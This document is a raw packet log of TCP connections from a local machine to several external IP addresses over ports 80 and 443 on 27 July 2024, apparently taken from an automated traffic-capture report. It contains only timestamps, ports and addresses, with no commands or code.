                                                                              Jul 27, 2024 14:53:23.390978098 CEST4976880192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:23.396817923 CEST8049768187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:23.396847963 CEST8049768187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:23.897711992 CEST44349764167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:23.897756100 CEST44349764167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:23.898041010 CEST49764443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:23.912504911 CEST49764443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:23.912504911 CEST49764443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:23.912533998 CEST44349764167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:23.912548065 CEST44349764167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:24.021370888 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.021410942 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.021478891 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.021836042 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.021852016 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.455123901 CEST8049768187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.455200911 CEST8049768187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.455260038 CEST4976880192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.455461979 CEST4976880192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.457470894 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.460320950 CEST8049768187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.462460041 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.462533951 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.462613106 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.462646008 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:24.467861891 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.467891932 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:24.625243902 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.625382900 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.628361940 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.628381014 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.628438950 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.628444910 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.628634930 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:24.628916979 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:24.672573090 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:25.533337116 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:25.533550024 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:25.533642054 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:25.533721924 CEST4977080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:25.538639069 CEST8049770187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:25.998303890 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:25.998361111 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:25.998430967 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:26.013575077 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:26.013575077 CEST49769443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:26.013603926 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:26.013617039 CEST44349769107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:26.117647886 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.117729902 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.117830992 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.118171930 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.118206024 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.702372074 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.702467918 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.705185890 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.705214024 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.705337048 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.705348969 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.705399990 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.705409050 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.705487013 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:26.705637932 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:26.752536058 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:27.071536064 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.071620941 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.071706057 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.080961943 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.080997944 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.559772015 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.559986115 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.565825939 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.565854073 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.566262960 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.619035959 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.734761000 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.776535988 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.992557049 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.992650032 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.992703915 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:27.992733955 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.995856047 CEST44349774104.26.3.16192.168.2.4
                                                                              Jul 27, 2024 14:53:27.995920897 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:28.058059931 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:28.058331013 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:28.058410883 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:28.077537060 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:28.077580929 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:28.077610016 CEST49772443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:53:28.077625036 CEST44349772107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:53:28.184501886 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.184571028 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.184695959 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.185230017 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.185262918 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.360019922 CEST49774443192.168.2.4104.26.3.16
                                                                              Jul 27, 2024 14:53:28.439785957 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:28.439831972 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:28.439903975 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:28.443964958 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:28.443993092 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:28.845285892 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.845382929 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.884471893 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.884540081 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.884602070 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.884613991 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.885148048 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.885404110 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:28.932499886 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:28.938901901 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:28.939002037 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:28.967860937 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:28.967891932 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:28.968801022 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.018135071 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.081083059 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.081284046 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.081455946 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.548739910 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.548940897 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.550935984 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.554871082 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.554917097 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.554946899 CEST49777443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.554963112 CEST44349777188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.558765888 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.558804035 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.558883905 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.559520960 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:29.559550047 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:29.854965925 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:29.855067968 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:29.855217934 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:29.872045994 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:29.872100115 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:29.872131109 CEST49776443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:53:29.872147083 CEST44349776167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:53:29.987647057 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:29.987674952 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:29.987999916 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:29.988297939 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:29.988307953 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.271478891 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.271564007 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.279778004 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.279804945 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.280131102 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.281356096 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.281397104 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.281523943 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.284223080 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:30.284251928 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:30.284315109 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:30.291882992 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:30.291901112 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:30.720850945 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.720910072 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.721079111 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.721112013 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.723860025 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.723920107 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.723932028 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.731234074 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.731333017 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.731345892 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.731359959 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.731415033 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.735155106 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.738832951 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.738898039 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.738909960 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.741817951 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.741877079 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.741889000 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.811585903 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.811738014 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.811971903 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.812010050 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.812035084 CEST49778443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:30.812047958 CEST44349778188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:30.879131079 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.879218102 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:30.886436939 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:30.886487007 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.886547089 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:30.886557102 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.886831045 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:30.886840105 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.886919022 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.887182951 CEST49779443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:53:30.928538084 CEST44349779107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:53:30.967921019 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:30.967984915 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:30.971048117 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:30.971056938 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:30.971441984 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:30.986680984 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.032531977 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.236218929 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.239228010 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.239311934 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.239340067 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.245593071 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.246010065 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.246017933 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.248543024 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.250113964 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.250176907 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.328042984 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.328109980 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.329351902 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.329411030 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.333523035 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.333580017 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.338255882 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.338318110 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.340049982 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.340116978 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.342617035 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.342672110 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.349163055 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.349225998 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.355112076 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.355181932 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.365921021 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.365983009 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.416688919 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.416768074 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.418317080 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.418724060 CEST49781443192.168.2.4188.114.97.3
                                                                              Jul 27, 2024 14:53:31.418756962 CEST44349781188.114.97.3192.168.2.4
                                                                              Jul 27, 2024 14:53:31.421497107 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.421564102 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.423434973 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.423508883 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.426037073 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.426104069 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.434216976 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.434279919 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.434999943 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.435368061 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.436598063 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.436655045 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.439717054 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.439780951 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.441529036 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.441592932 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.443130016 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.443191051 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.446135998 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.446248055 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.449350119 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.449410915 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.450882912 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.451015949 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.454016924 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.454077005 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.455589056 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.455650091 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.459800959 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.459870100 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.512394905 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.512465954 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.514509916 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.514570951 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.518724918 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.518785954 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.519774914 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.519825935 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.522859097 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.522922039 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.524154902 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.524216890 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.529285908 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.529309034 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.529344082 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.529345036 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.529370070 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.529376984 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.529388905 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.531711102 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.531761885 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.531769991 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.531815052 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.532866955 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.532919884 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.535160065 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.535218954 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.536298990 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.536369085 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.538331985 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.538394928 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.539231062 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.539289951 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.541038990 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.541100025 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.542031050 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.542109013 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.543785095 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.543845892 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.545320988 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.545384884 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.546494961 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.546562910 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.547755003 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.547815084 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.549192905 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.549251080 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.550403118 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.550457001 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.551214933 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.551276922 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.551984072 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.552037954 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.553339958 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.555994034 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.556068897 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.556799889 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.556849003 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.561806917 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.606084108 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.606158018 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.606483936 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.606538057 CEST49780443192.168.2.431.14.70.245
                                                                              Jul 27, 2024 14:53:31.608374119 CEST4434978031.14.70.245192.168.2.4
                                                                              Jul 27, 2024 14:53:31.608431101 CEST49780443192.168.2.431.14.70.245
